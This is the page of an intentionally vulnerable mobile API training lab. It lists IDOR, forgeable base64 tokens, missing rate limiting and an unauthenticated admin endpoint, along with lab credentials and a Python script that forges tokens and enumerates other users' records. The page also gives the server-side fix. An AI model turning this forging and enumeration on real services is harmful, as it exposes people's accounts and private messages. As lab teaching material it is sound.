📱 MobileApp API v2.1

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Proxy this through Burp Suite. IDOR on /api/user/<id> and /api/messages/<user_id>, no rate limiting on login, forgeable token, sensitive data (including passwords) in responses.

API Endpoints

POST /api/login
Login — no rate limiting, so credentials can be brute-forced freely. Body: {"username":"alice","password":"alice123"}
Lab Credentials: ram / pracivo  |  alice / alice123  |  bob / bob456  |  admin / adminpass
GET /api/user/<id>
Get user data — IDOR: no ownership check, so any valid token can read any id. Try /api/user/1, /api/user/2, /api/user/3
GET /api/messages/<user_id>
Get messages — IDOR: change user_id to read other users' messages
GET /api/profile
Get own profile using the token header — the token is just base64(user_id), so a token for any user can be forged without logging in
GET /api/admin/users
Admin endpoint — no auth check. Lists all users with passwords.
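The two weaknesses above combine: because the token is base64(user_id), an attacker never needs the login endpoint at all, and because neither /api/user/<id> nor /api/messages/<user_id> compares the requested id with the token's user, one forged token walks every record. The script below is an added example written for this page, not code from the Pracivo lab itself. It assumes the token header is named "X-Token" (the page does not name it) and ships a constructed in-memory stand-in for the lab server, with made-up ids, so it runs offline; point http_fetch at the real lab (via Burp on 127.0.0.1:8080) to run it live.

```python
"""Added example (not part of the Pracivo lab page): forge the base64(user_id)
token and enumerate the IDOR on /api/user/<id> and /api/messages/<user_id>.

Assumptions, since the page does not state them:
  - the token header is named "X-Token"
  - which numeric id belongs to which lab user (constructed below)
"""
import base64
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Optional

TOKEN_HEADER = "X-Token"  # assumption: the page never names the header


def forge_token(user_id: int) -> str:
    """Lab tokens are base64(user_id), so a token for any user can be minted offline."""
    return base64.b64encode(str(user_id).encode()).decode()


def decode_token(token: str) -> int:
    """Inverse of forge_token; tells enumerate_idor which id is 'ours'."""
    return int(base64.b64decode(token).decode())


Fetch = Callable[[str, Dict[str, str]], Optional[dict]]


def http_fetch(url: str, headers: Dict[str, str]) -> Optional[dict]:
    """GET url with headers; return the JSON body, or None on 401/403/404.
    Route through Burp (HTTP_PROXY=http://127.0.0.1:8080) to see each request."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return json.loads(resp.read().decode())
    except urllib.error.HTTPError as err:
        if err.code in (401, 403, 404):
            return None
        raise


def enumerate_idor(base_url: str, path_template: str, ids: Iterable[int],
                   token: str, fetch: Fetch = http_fetch) -> Dict[int, dict]:
    """Request path_template for every id with ONE fixed token.
    A record returned for an id other than the token's own user is an IDOR hit."""
    own_id = decode_token(token)
    hits: Dict[int, dict] = {}
    for uid in ids:
        body = fetch(base_url + path_template.format(id=uid), {TOKEN_HEADER: token})
        if body is not None and uid != own_id:
            hits[uid] = body
    return hits


# --- constructed stand-in for the lab server, so this runs offline ----------
FAKE_USERS = {  # constructed ids; the real lab may number its users differently
    1: {"id": 1, "username": "ram"},
    2: {"id": 2, "username": "alice"},
    3: {"id": 3, "username": "bob"},
}
FAKE_MESSAGES = {
    1: ["constructed message for ram"],
    2: ["constructed message for alice"],
    3: ["constructed message for bob"],
}


def fake_lab_fetch(url: str, headers: Dict[str, str]) -> Optional[dict]:
    """Mimics the described lab behaviour: any token that decodes is accepted,
    and the requested id is never compared with the token's user."""
    if TOKEN_HEADER not in headers:
        return None  # constructed: no token -> treated as 401
    decode_token(headers[TOKEN_HEADER])  # "validation" is just decoding
    resource, _, uid_str = url.rsplit("/api/", 1)[1].partition("/")
    uid = int(uid_str)
    if resource == "user":
        return FAKE_USERS.get(uid)
    if resource == "messages":
        msgs = FAKE_MESSAGES.get(uid)
        return None if msgs is None else {"user_id": uid, "messages": msgs}
    return None


if __name__ == "__main__":
    alice = forge_token(2)  # no login needed: the token is derivable from the id
    print("forged token for id 2:", alice)
    for path in ("/api/user/{id}", "/api/messages/{id}"):
        leaked = enumerate_idor("http://lab.local", path, range(1, 5), alice,
                                fetch=fake_lab_fetch)
        print(path, "->", leaked)
```

Against the real lab, swap fake_lab_fetch for the default http_fetch and widen the id range; every id that comes back for a token it does not belong to is a confirmed ownership-check failure. The fix on the server side is both halves: a token that cannot be derived from public data (a random session id or a signed token), and a comparison of the authenticated user with the requested id on every object-level route.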

Quick Test

To intercept real traffic, proxy your phone through Burp Suite on port 8080 and open the app; the API calls above will appear in the proxy history, where you can replay them with modified ids and tokens.